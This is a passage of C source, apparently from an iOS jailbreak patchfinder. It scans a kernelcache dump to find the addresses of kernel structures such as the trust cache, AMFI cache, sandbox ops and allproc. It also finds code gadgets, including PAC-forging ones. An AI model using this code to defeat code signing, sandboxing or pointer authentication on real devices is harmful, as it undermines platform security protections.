}\n    \n    str = Boyermoore_horspool_memmem(Kernel + base, size, (uint8_t *)string, strlen(string));\n    \n    if (exactMatch) {\n        while (strcmp((char *)str, string)) {\n            base += ((uint64_t)str - (uint64_t)Kernel - (uint64_t)base) + 1;\n            size -= strlen((char *)str) + 1;\n            str = Boyermoore_horspool_memmem(Kernel + base, size, (uint8_t *)string, strlen(string));\n        }\n    }\n    \n    if (!str) {\n        return 0;\n    }\n    return Find_reference(str - Kernel + KernDumpBase, n, type);\n}\n\n/****** fun *******/\n\naddr_t Find_add_x0_x0_0x40_ret(void) {\n    addr_t off;\n    uint32_t *k;\n    k = (uint32_t *)(Kernel + XNUCore_Base);\n    for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {\n        if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {\n            return off + XNUCore_Base + KernDumpBase + kernel_slide;\n        }\n    }\n    k = (uint32_t *)(Kernel + Prelink_Base);\n    for (off = 0; off < Prelink_Size - 4; off += 4, k++) {\n        if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {\n            return off + Prelink_Base + KernDumpBase + kernel_slide;\n        }\n    }\n    return 0;\n}\n\nuint64_t Find_allproc(void) {\n    // Find the first reference to the string\n    addr_t ref = Find_strref(\"\\\"pgrp_add : pgrp is dead adding process\\\"\", 1, 0, false);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    uint32_t op_before = *(uint32_t *)(Kernel + ref - 8);\n    if ((op_before & 0xFC000000) == 0x14000000) {\n        ref = Find_reference(ref - 4 + KernDumpBase, 1, 0);\n        if (!ref) {\n            return 0;\n        }\n        ref -= KernDumpBase;\n    }\n    \n    uint64_t start = BOF64(Kernel, XNUCore_Base, ref);\n    if (!start) {\n        return 0;\n    }\n    \n    // Find AND W8, W8, #0xFFFFDFFF - it's a pretty distinct instruction\n    addr_t weird_instruction = 0;\n    for (int i = 4; i < 5*0x100; i+=4) {\n        uint32_t op = *(uint32_t *)(Kernel + ref + i);\n  
      if (op == 0x12127908) {\n            weird_instruction = ref+i;\n            break;\n        }\n    }\n    if (!weird_instruction) {\n        return 0;\n    }\n    \n    uint64_t val = Calc64(Kernel, start, weird_instruction - 8, 8);\n    if (!val) {\n        printf(\"Failed to calculate x8\");\n        return 0;\n    }\n    \n    return val + KernDumpBase + kernel_slide;\n}\n\nuint64_t Find_copyout(void) {\n    // Find the first reference to the string\n    addr_t ref = Find_strref(\"\\\"%s(%p, %p, %lu) - transfer too large\\\"\", 2, 0, false);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t start = 0;\n    for (int i = 4; i < 0x100*4; i+=4) {\n        uint32_t op = *(uint32_t*)(Kernel+ref-i);\n        if (op == 0xd10143ff) { // SUB SP, SP, #0x50\n            start = ref-i;\n            break;\n        }\n    }\n    if (!start) {\n        return 0;\n    }\n    \n    return start + KernDumpBase + kernel_slide;\n}\n\nuint64_t Find_bzero(void) {\n    // Just find SYS #3, c7, c4, #1, X3, then get the start of that function\n    addr_t off;\n    uint32_t *k;\n    k = (uint32_t *)(Kernel + XNUCore_Base);\n    for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {\n        if (k[0] == 0xd50b7423) {\n            off += XNUCore_Base;\n            break;\n        }\n    }\n    \n    uint64_t start = BOF64(Kernel, XNUCore_Base, off);\n    if (!start) {\n        return 0;\n    }\n    \n    return start + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_bcopy(void) {\n    // Jumps straight into memmove after switching x0 and x1 around\n    // Guess we just find the switch and that's it\n    addr_t off;\n    uint32_t *k;\n    k = (uint32_t *)(Kernel + XNUCore_Base);\n    for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {\n        if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {\n            return off + XNUCore_Base + KernDumpBase + kernel_slide;\n        }\n    }\n    k = (uint32_t 
*)(Kernel + Prelink_Base);\n    for (off = 0; off < Prelink_Size - 4; off += 4, k++) {\n        if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {\n            return off + Prelink_Base + KernDumpBase + kernel_slide;\n        }\n    }\n    return 0;\n}\n\nuint64_t Find_rootvnode(void) {\n    // Find the first reference to the string\n    addr_t ref = Find_strref(\"/var/run/.vfs_rsrc_streams_%p%x\", 1, 0, false);\n    \n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t start = BOF64(Kernel, XNUCore_Base, ref);\n    if (!start) {\n        return 0;\n    }\n    \n    // Find MOV X9, #0x2000000000 - it's a pretty distinct instruction\n    addr_t weird_instruction = 0;\n    for (int i = 4; i < 4*0x100; i+=4) {\n        uint32_t op = *(uint32_t *)(Kernel + ref - i);\n        if (op == 0xB25B03E9) {\n            weird_instruction = ref-i;\n            break;\n        }\n    }\n    if (!weird_instruction) {\n        ref = Find_strref(\"/var/run/.vfs_rsrc_streams_%p%x\", 2, 0, false);\n        \n        if (!ref) {\n            return 0;\n        }\n        \n        ref -= KernDumpBase;\n        \n        start = BOF64(Kernel, XNUCore_Base, ref);\n        if (!start) {\n            return 0;\n        }\n        \n        for (int i = 4; i < 4*0x100; i+=4) {\n            uint32_t op = *(uint32_t *)(Kernel + ref - i);\n            if (op == 0xB25B03E9) {\n                weird_instruction = ref-i;\n                break;\n            }\n        }\n        if (!weird_instruction) {\n            return 0;\n        }\n    }\n    \n    uint64_t val = Calc64(Kernel, start, weird_instruction, 8);\n    if (!val) {\n        return 0;\n    }\n    \n    return val + KernDumpBase + kernel_slide;\n}\n\n\naddr_t Find_vnode_lookup() {\n    addr_t ref, call, bof, func;\n    ref = Find_strref(\"/private/var/mobile\", 0, 0, false);\n    if (!ref) {\n        return 0;\n    }\n    \n    ref -= KernDumpBase;\n    bof 
= BOF64(Kernel, XNUCore_Base, ref);\n    if (!bof) {\n        return 0;\n    }\n    \n    call = Step64(Kernel, ref, ref - bof, INSN_CALL);\n    if (!call) {\n        ref = Find_strref(\"/private/var/mobile\", 2, 0, false);\n        if (!ref) {\n            return 0;\n        }\n        ref -= KernDumpBase;\n        \n        bof = BOF64(Kernel, XNUCore_Base, ref);\n        if (!bof) {\n            return 0;\n        }\n        \n        call = Step64(Kernel, ref, ref - bof, INSN_CALL);\n        if (!call) {\n            return 0;\n        }\n    }\n    \n    call += 4;\n    call = Step64(Kernel, call, call - bof, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    call += 4;\n    call = Step64(Kernel, call, call - bof, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    func = Follow_call64(Kernel, call);\n    if (!func) {\n        return 0;\n    }\n    \n    return func + KernDumpBase + kernel_slide;\n}\n\n// this is so bad ik\naddr_t Find_vfs_context_current(void) {\n    uint64_t string = Find_strref(\"apfs_vnop_renamex\", 5, 0, true);\n    if (!string) {\n        return 0;\n    }\n    string -= KernDumpBase;\n    \n    uint64_t call = Step64_back(Kernel, string, 100, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    uint64_t call2 = Step64_back(Kernel, call - 4, 100, INSN_CALL);\n    if (!call2) {\n        return 0;\n    }\n    \n    uint64_t func = Follow_call64(Kernel, call2);\n    if (!func) {\n        return 0;\n    }\n    return func + KernDumpBase + kernel_slide;\n}\n\n// strictly for new kernelcache formats. 
on older ones find string in prelink section instead\naddr_t Find_vnode_put(void) {\n    uint64_t str = Find_strref(\"%s:%d: UNSET root_to_xid - on next boot, volume will root to liv\", 1, 0, false);\n    if (!str) {\n        return 0;\n    }\n    str -= KernDumpBase;\n    \n    uint64_t call = Step64(Kernel, str, 100, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    uint64_t call2 = Step64(Kernel, call + 4, 100, INSN_CALL);\n    if (!call2) {\n        return 0;\n    }\n    \n    uint64_t call3 = Step64(Kernel, call2 + 4, 100, INSN_CALL);\n    if (!call3) {\n        return 0;\n    }\n    \n    uint64_t func = Follow_call64(Kernel, call3);\n    if (!func) {\n        return 0;\n    }\n    return func + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_trustcache(void) {\n    addr_t call, func, ref;\n    \n    ref = Find_strref(\"%s: only allowed process can check the trust cache\", 1, 1, false);\n    if (!ref) {\n        ref = Find_strref(\"%s: only allowed process can check the trust cache\", 1, 0, false);\n        if (!ref) {\n            return 0;\n        }\n    }\n    ref -= KernDumpBase;\n    \n    call = Step64_back(Kernel, ref, 44, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    func = Follow_call64(Kernel, call);\n    if (!func) {\n        return 0;\n    }\n    \n    call = Step64(Kernel, func, 32, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    func = Follow_call64(Kernel, call);\n    if (!func) {\n        return 0;\n    }\n    \n    call = Step64(Kernel, func, 32, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    call = Step64(Kernel, call + 4, 32, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    func = Follow_call64(Kernel, call);\n    if (!func) {\n        return 0;\n    }\n    \n    call = Step64(Kernel, func, 48, INSN_CALL);\n    if (!call) {\n        return 0;\n    }\n    \n    uint64_t val = Calc64(Kernel, call, call + 24, 21);\n    if (!val) {\n        // iOS 
12\n        \n        if (PPLText_size) {\n            // A12\n            \n            ref = Find_strref(\"\\\"loadable trust cache buffer too small (%ld) for entries claimed (%d)\\\"\", 1, 4, false);\n            if (!ref) {\n                return 0;\n            }\n            \n            ref -= KernDumpBase;\n            \n            val = Calc64(Kernel, ref-32*4, ref-24*4, 8);\n            if (!val) {\n                return 0;\n            }\n            \n            return val + KernDumpBase + kernel_slide;\n        }\n        else {\n            ref = Find_strref(\"\\\"loadable trust cache buffer too small (%ld) for entries claimed (%d)\\\"\", 1, 0, false);\n        }\n        \n        if (!ref) {\n            return 0;\n        }\n        ref -= KernDumpBase;\n        \n        val = Calc64(Kernel, ref-12*4, ref-12*4+12, 8);\n        if (!val) {\n            return 0;\n        }\n        return val + KernDumpBase + kernel_slide;\n    }\n    return val + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_pmap_load_trust_cache_ppl() {\n    uint64_t ref = Find_strref(\"%s: trust cache already loaded, ignoring\", 2, 0, false);\n    if (!ref) {\n        ref = Find_strref(\"%s: trust cache already loaded, ignoring\", 1, 0, false);\n        if (!ref) {\n            return 0;\n        }\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t func = Step64_back(Kernel, ref, 200, INSN_CALL);\n    if (!func) {\n        return 0;\n    }\n    \n    func -= 4;\n    \n    func = Step64_back(Kernel, func, 200, INSN_CALL);\n    if (!func) {\n        return 0;\n    }\n    \n    func = Follow_call64(Kernel, func);\n    if (!func) {\n        return 0;\n    }\n    \n    return func + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_amficache() {\n    uint64_t cbz, call, func, val;\n    uint64_t ref = Find_strref(\"amfi_prevent_old_entitled_platform_binaries\", 1, 1, false);\n    if (!ref) {\n        // iOS 11\n        ref = Find_strref(\"com.apple.MobileFileIntegrity\", 0, 1, 
false);\n        if (!ref) {\n            return 0;\n        }\n        ref -= KernDumpBase;\n        call = Step64(Kernel, ref, 64, INSN_CALL);\n        if (!call) {\n            return 0;\n        }\n        call = Step64(Kernel, call + 4, 64, INSN_CALL);\n        goto okay;\n    }\n    ref -= KernDumpBase;\n    cbz = Step64(Kernel, ref, 32, INSN_CBZ);\n    if (!cbz) {\n        return 0;\n    }\n    call = Step64(Kernel, Follow_cbz(Kernel, cbz), 4, INSN_CALL);\nokay:\n    if (!call) {\n        return 0;\n    }\n    func = Follow_call64(Kernel, call);\n    if (!func) {\n        return 0;\n    }\n    val = Calc64(Kernel, func, func + 16, 8);\n    if (!val) {\n        ref = Find_strref(\"%s: only allowed process can check the trust cache\", 1, 1, false); // Trying to find AppleMobileFileIntegrityUserClient::isCdhashInTrustCache\n        if (!ref) {\n            return 0;\n        }\n        ref -= KernDumpBase;\n        call = Step64_back(Kernel, ref, 11*4, INSN_CALL);\n        if (!call) {\n            return 0;\n        }\n        func = Follow_call64(Kernel, call);\n        if (!func) {\n            return 0;\n        }\n        call = Step64(Kernel, func, 8*4, INSN_CALL);\n        if (!call) {\n            return 0;\n        }\n        func = Follow_call64(Kernel, call);\n        if (!func) {\n            return 0;\n        }\n        call = Step64(Kernel, func, 8*4, INSN_CALL);\n        if (!call) {\n            return 0;\n        }\n        call = Step64(Kernel, call+4, 8*4, INSN_CALL);\n        if (!call) {\n            return 0;\n        }\n        func = Follow_call64(Kernel, call);\n        if (!func) {\n            return 0;\n        }\n        call = Step64(Kernel, func, 12*4, INSN_CALL);\n        if (!call) {\n            return 0;\n        }\n        \n        val = Calc64(Kernel, call, call + 6*4, 21);\n    }\n    return val + KernDumpBase + kernel_slide;\n}\n\n\naddr_t Find_zone_map_ref(void) {\n    // \\\"Nothing being freed to the zone_map. 
start = end = %p\\\\n\\\"\n    uint64_t val = KernDumpBase;\n    \n    addr_t ref = Find_strref(\"\\\"Nothing being freed to the zone_map. start = end = %p\\\\n\\\"\", 1, 0, false);\n    ref -= KernDumpBase;\n    \n    // skip add & adrp for panic str\n    ref -= 8;\n    \n    // adrp xX, #_zone_map@PAGE\n    ref = Step64_back(Kernel, ref, 30, INSN_ADRP);\n    \n    uint32_t *insn = (uint32_t*)(Kernel+ref);\n    // get pc\n    val += ((uint8_t*)(insn) - Kernel) & ~0xfff;\n    uint8_t xm = *insn & 0x1f;\n    \n    // don't ask, I wrote this at 5am\n    val += (*insn<<9 & 0x1ffffc000) | (*insn>>17 & 0x3000);\n    \n    // ldr x, [xX, #_zone_map@PAGEOFF]\n    ++insn;\n    if ((*insn & 0xF9C00000) != 0xF9400000) {\n        return 0;\n    }\n    \n    // xd == xX, xn == xX,\n    if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm) {\n        return 0;\n    }\n    \n    val += ((*insn >> 10) & 0xFFF) << 3;\n    \n    return val + kernel_slide;\n}\n\naddr_t Find_OSBoolean_True() {\n    addr_t val;\n    addr_t ref = Find_strref(\"Delay Autounload\", 0, 0, false);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    addr_t weird_instruction = 0;\n    for (int i = 4; i < 4*0x100; i+=4) {\n        uint32_t op = *(uint32_t *)(Kernel + ref + i);\n        if (op == 0x320003E0) {\n            weird_instruction = ref+i;\n            break;\n        }\n    }\n    if (!weird_instruction) {\n        ref = Find_strref(\"Delay Autounload\", 2, 0, false);\n        if (!ref) {\n            return 0;\n        }\n        ref -= KernDumpBase;\n        \n        for (int i = 4; i < 4*0x100; i+=4) {\n            uint32_t op = *(uint32_t *)(Kernel + ref + i);\n            if (op == 0x320003E0) {\n                weird_instruction = ref+i;\n                break;\n            }\n        }\n        if (!weird_instruction) {\n            return 0;\n        }\n    }\n    \n    val = Calc64(Kernel, ref, weird_instruction, 8);\n    if (!val) {\n        return 0;\n    }\n    
\n    return rk64(val + KernDumpBase + kernel_slide);\n}\n\naddr_t Find_OSBoolean_False() {\n    return Find_OSBoolean_True()+8;\n}\n\naddr_t Find_osunserializexml() {\n    addr_t ref = Find_strref(\"OSUnserializeXML: %s near line %d\\n\", 1, 0, false);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t start = BOF64(Kernel, XNUCore_Base, ref);\n    if (!start) {\n        return 0;\n    }\n    \n    return start + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_smalloc() {\n    addr_t ref = Find_strref(\"sandbox memory allocation failure\", 1, 1, false);\n    if (!ref) {\n        ref = Find_strref(\"sandbox memory allocation failure\", 1, 2, false);\n        if (!ref) {\n            return 0;\n        }\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t start = BOF64(Kernel, Prelink_Base, ref);\n    if (!start) {\n        start = BOF64(Kernel, XNUCore_Base, ref);\n        if (!start) {\n            return 0;\n        }\n    }\n    \n    return start + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_sbops() {\n    addr_t off, what;\n    uint8_t *str = Boyermoore_horspool_memmem(Kernel + PString_base, PString_size, (uint8_t *)\"Seatbelt sandbox policy\", sizeof(\"Seatbelt sandbox policy\") - 1);\n    if (!str) {\n        return 0;\n    }\n    what = str - Kernel + KernDumpBase;\n    for (off = 0; off < Kernel_size - Prelink_Base; off += 8) {\n        if (*(uint64_t *)(Kernel + Prelink_Base + off) == what) {\n            return *(uint64_t *)(Kernel + Prelink_Base + off + 24) + kernel_slide;\n        }\n    }\n    return 0;\n}\n\nuint64_t Find_bootargs(void) {\n    \n    /*\n     ADRP            X8, #_PE_state@PAGE\n     ADD             X8, X8, #_PE_state@PAGEOFF\n     LDR             X8, [X8,#(PE_state__boot_args - 0xFFFFFFF0078BF098)]\n     ADD             X8, X8, #0x6C\n     STR             X8, [SP,#0x550+var_550]\n     ADRP            X0, #aBsdInitCannotF@PAGE ; \"\\\"bsd_init: cannot find root vnode: %s\"...\n     ADD          
   X0, X0, #aBsdInitCannotF@PAGEOFF ; \"\\\"bsd_init: cannot find root vnode: %s\"...\n     BL              _panic\n     */\n    \n    addr_t ref = Find_strref(\"\\\"bsd_init: cannot find root vnode: %s\\\"\", 1, 0, false);\n    \n    if (ref == 0) {\n        return 0;\n    }\n    \n    ref -= KernDumpBase;\n    // skip add & adrp for panic str\n    ref -= 8;\n    uint32_t *insn = (uint32_t*)(Kernel+ref);\n    \n    // skip str\n    --insn;\n    // add xX, xX, #cmdline_offset\n    uint8_t xm = *insn&0x1f;\n    if (((*insn>>5)&0x1f) != xm || ((*insn>>22)&3) != 0) {\n        return 0;\n    }\n    \n    //cmdline_offset = (*insn>>10) & 0xfff;\n    \n    uint64_t val = KernDumpBase;\n    \n    --insn;\n    // ldr xX, [xX, #(PE_state__boot_args - PE_state)]\n    if ((*insn & 0xF9C00000) != 0xF9400000) {\n        return 0;\n    }\n    // xd == xX, xn == xX,\n    if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm) {\n        return 0;\n    }\n    \n    val += ((*insn >> 10) & 0xFFF) << 3;\n    \n    --insn;\n    // add xX, xX, #_PE_state@PAGEOFF\n    if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm || ((*insn>>22)&3) != 0) {\n        return 0;\n    }\n    \n    val += (*insn>>10) & 0xfff;\n    \n    --insn;\n    if ((*insn & 0x1f) != xm) {\n        return 0;\n    }\n    \n    // pc\n    val += ((uint8_t*)(insn) - Kernel) & ~0xfff;\n    \n    // don't ask, I wrote this at 5am\n    val += (*insn<<9 & 0x1ffffc000) | (*insn>>17 & 0x3000);\n    \n    return val + kernel_slide;\n}\n\naddr_t Find_l2tp_domain_module_start() {\n    uint64_t string = (uint64_t)Boyermoore_horspool_memmem(Kernel + Data_base, Data_size, (const unsigned char *)\"com.apple.driver.AppleSynopsysOTGDevice\", strlen(\"com.apple.driver.AppleSynopsysOTGDevice\")) - (uint64_t)Kernel;\n    if (!string) {\n        return  0;\n    }\n    \n    // uint64_t val = *(uint64_t*)(string + (uint64_t)Kernel - 0x20);\n    // not sure if this is constant among all devices if (val == 0x8010000001821088) return string + 
KernDumpBase - 0x20;\n    // return 0;\n    \n    return string + KernDumpBase - 0x20 + kernel_slide;\n}\n\naddr_t Find_l2tp_domain_module_stop() {\n    uint64_t string = (uint64_t)Boyermoore_horspool_memmem(Kernel + Data_base, Data_size, (const unsigned char *)\"com.apple.driver.AppleSynopsysOTGDevice\", strlen(\"com.apple.driver.AppleSynopsysOTGDevice\")) - (uint64_t)Kernel;\n    if (!string) {\n        return  0;\n    }\n    \n    // uint64_t val = *(uint64_t*)(string + (uint64_t)Kernel - 0x20);\n    // not sure if this is constant among all devices if (val == 0x8178000001821180) return string + KernDumpBase - 0x18;\n    // return 0;\n    \n    return string + KernDumpBase - 0x18 + kernel_slide;\n}\n\naddr_t Find_l2tp_domain_inited() {\n    uint64_t ref = Find_strref(\"L2TP domain init\\n\", 1, 0, true);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t addr = Calc64(Kernel, ref, ref + 32, 8);\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_sysctl_net_ppp_l2tp() {\n    uint64_t ref = Find_strref(\"L2TP domain terminate : PF_PPP domain does not exist...\\n\", 1, 0, true);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    ref += 4;\n    \n    uint64_t addr = Calc64(Kernel, ref, ref + 28, 0);\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_sysctl_unregister_oid() {\n    uint64_t ref = Find_strref(\"L2TP domain terminate : PF_PPP domain does not exist...\\n\", 1, 0, true);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t addr = Step64(Kernel, ref, 28, INSN_CALL);\n    if (!addr) {\n        return 0;\n    }\n    \n    addr += 4;\n    addr = Step64(Kernel, addr, 28, INSN_CALL);\n    if (!addr) {\n        return 0;\n    }\n    \n    uint64_t call = Follow_call64(Kernel, addr);\n    if (!call) {\n        return 0;\n    }\n    return 
call + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_mov_x0_x4__br_x5() {\n    uint32_t bytes[] = {\n        0xaa0403e0, // mov x0, x4\n        0xd61f00a0  // br x5\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_mov_x9_x0__br_x1() {\n    uint32_t bytes[] = {\n        0xaa0003e9, // mov x9, x0\n        0xd61f0020  // br x1\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_mov_x10_x3__br_x6() {\n    uint32_t bytes[] = {\n        0xaa0303ea, // mov x10, x3\n        0xd61f00c0  // br x6\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kernel_forge_pacia_gadget() {\n    \n    uint32_t bytes[] = {\n        0xdac10149, // paci\n        0xf9007849  // str x9, [x2, #240]\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kernel_forge_pacda_gadget() {\n    \n    uint32_t bytes[] = {\n        0xdac10949, // pacd x9\n        0xf9007449  // str x9, [x2, #232]\n    };\n    \n    uint64_t addr = 
(uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr - (uint64_t)Kernel + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_IOUserClient_vtable() {\n    uint64_t ref1 = Find_strref(\"IOUserClient\", 2, 0, true);\n    if (!ref1) {\n        return 0;\n    }\n    ref1 -= KernDumpBase;\n    \n    uint64_t ref2 = Find_strref(\"IOUserClient\", 3, 0, true);\n    if (!ref2) {\n        return 0;\n    }\n    ref2 -= KernDumpBase;\n    \n    uint64_t func2 = BOF64(Kernel, XNUCore_Base, ref2);\n    if (!func2) {\n        return 0;\n    }\n    \n    uint64_t vtable = Calc64(Kernel, ref1, func2, 8);\n    if (!vtable) {\n        return 0;\n    }\n    \n    //vtable -= 0x10;\n    \n    return vtable + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_IORegistryEntry__getRegistryEntryID() {\n    \n    uint32_t bytes[] = {\n        0xf9400808, // ldr x8, [x0, #0x10]\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    \n    // basically just look the instructions\n    // can't find a better way\n    // this was not done like the previous gadgets because an address is being used, which won't be the same between devices so can't be hardcoded and i gotta use masks\n    \n    // cbz x8, SOME_ADDRESS <= where we do masking (((*(uint32_t *)(addr + 4)) & 0xFC000000) != 0xb4000000)\n    // ldr x0, [x8, #8]     <= 2nd part of 0xd65f03c0f9400500\n    // ret                  <= 1st part of 0xd65f03c0f9400500\n    \n    while ((((*(uint32_t *)(addr + 4)) & 0xFC000000) != 0xb4000000) || (*(uint64_t*)(addr + 8) != 0xd65f03c0f9400500)) {\n        addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)(addr + 4), XNUCore_Size, (const unsigned char *)bytes, 
sizeof(bytes));\n    }\n    \n    return addr + KernDumpBase - (uint64_t)Kernel + kernel_slide;\n}\n\naddr_t Find_cs_gen_count() {\n    uint64_t ref = Find_strref(\"CS Platform Exec Logging: Executing platform signed binary '%s'\", 1, 2, false);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t addr = Step64(Kernel, ref, 200, INSN_ADRP);\n    if (!addr) {\n        return 0;\n    }\n    \n    addr = Calc64(Kernel, addr, addr + 12, 25);\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr + KernDumpBase + kernel_slide;\n}\n\n\naddr_t Find_cs_validate_csblob() {\n    \n    uint32_t bytes[] = {\n        0x52818049, // mov w9, #0xC02\n        0x72bf5bc9, // movk w9, #0xfade, lsl#16\n        0x6b09011f  // cmp w8, w9\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    \n    addr -= (uint64_t)Kernel;\n    addr = BOF64(Kernel, XNUCore_Base, addr);\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kalloc_canblock() {\n    \n    uint32_t bytes[] = {\n        0xaa0003f3, // mov x19, x0\n        0xf9400274, // ldr x20, [x19]\n        0xf11fbe9f  // cmp x20, #0x7ef\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    addr -= (uint64_t)Kernel;\n    \n    addr = BOF64(Kernel, XNUCore_Base, addr);\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_cs_blob_allocate_site() {\n    \n    uint32_t bytes[] = {\n        0xf9001ea8, // str x8, [x21, #0x38]\n        0xb9000ebf, // str wzr, [x21, #0xc]\n        0x3942a2a8, // ldrb 28, [x21, #0xa8]\n        
0x121e1508, // and w8, w8, #0xfc\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    addr -= (uint64_t)Kernel;\n    \n    addr = Step64_back(Kernel, addr, 200, INSN_ADRP);\n    if (!addr) {\n        return 0;\n    }\n    \n    addr = Calc64(Kernel, addr, addr + 8, 2);\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kfree() {\n    \n    uint32_t bytes[] = {\n        0xf9001ea8, // str x8, [x21, #0x38]\n        0xb9000ebf, // str wzr, [x21, #0xc]\n        0x3942a2a8, // ldrb 28, [x21, #0xa8]\n        0x121e1508, // and w8, w8, #0xfc\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    addr -= (uint64_t)Kernel;\n    \n    addr = Step64(Kernel, addr, 200, INSN_CALL);\n    if (!addr) {\n        return 0;\n    }\n    \n    addr += 4;\n    \n    addr = Step64(Kernel, addr, 200, INSN_CALL);\n    if (!addr) {\n        return 0;\n    }\n    \n    addr = Follow_call64(Kernel, addr);\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_cs_find_md() {\n    \n    uint32_t bytes[] = {\n        0xb9400008, // ldr w8, [x0]\n        0x529bdf49, // mov w9, #0xdefa\n        0x72a04189, // movk w9, #0x20c, lsl#16\n        0x6b09011f  // cmp w8, w9\n    };\n    \n    uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n    if (!addr) {\n        return 0;\n    }\n    \n    addr -= (uint64_t)Kernel;\n    \n    uint64_t adrp = Step64(Kernel, addr, 